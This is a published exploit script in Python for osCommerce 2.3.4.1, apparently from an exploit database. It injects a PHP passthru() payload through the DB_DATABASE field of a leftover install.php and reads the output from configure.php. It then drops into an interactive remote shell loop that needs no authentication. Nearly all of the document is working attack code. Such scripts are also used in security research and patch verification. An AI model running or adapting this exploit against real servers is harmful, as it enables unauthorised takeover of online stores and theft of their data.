# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2) # Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin # Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php # Notes: The RCE doesn't need to be authenticated # Date: 26/06/2021 # Exploit Author: Bryan Leong # Vendor Homepage: https://www.oscommerce.com/ # Version: osCommerce 2.3.4 # Tested on: Windows import requests import sys if(len(sys.argv) != 2): print("please specify the osCommerce url") print("format: python3 osCommerce2_3_4RCE.py ") print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog") sys.exit(0) baseUrl = sys.argv[1] testVulnUrl = baseUrl + '/install/install.php' def rce(command): #targeting the finish step which is step 4 targetUrl = baseUrl + '/install/install.php?step=4' payload = "');" payload += "passthru('" + command + "');" # injecting system command here payload += "/*" #injecting parameter data = { 'DIR_FS_DOCUMENT_ROOT': './', 'DB_DATABASE' : payload } response = requests.post(targetUrl, data=data) if(response.status_code == 200): #print('[*] Successfully injected payload to config file') readCMDUrl = baseUrl + '/install/includes/configure.php' cmd = requests.get(readCMDUrl) commandRsl = cmd.text.split('\n') if(cmd.status_code == 200): #print('[*] System Command Execution Completed') #removing the error message above for i in range(2, len(commandRsl)): print(commandRsl[i]) else: return '[!] Configure.php not found' else: return '[!] Fail to inject payload' #testing vulnerability accessing the directory test = requests.get(testVulnUrl) #checking the install directory still exist or able to access or not if(test.status_code == 200): print('[*] Install directory still available, the host likely vulnerable to the exploit.') #testing system command injection print('[*] Testing injecting system command to test vulnerability') cmd = 'whoami' print('User: ', end='') err = rce(cmd) if(err != None): print(err) sys.exit(0) while(True): cmd = input('RCE_SHELL$ ') err = rce(cmd) if(err != None): print(err) sys.exit(0) else: print('[!] Install directory not found, the host is not vulnerable') sys.exit(0)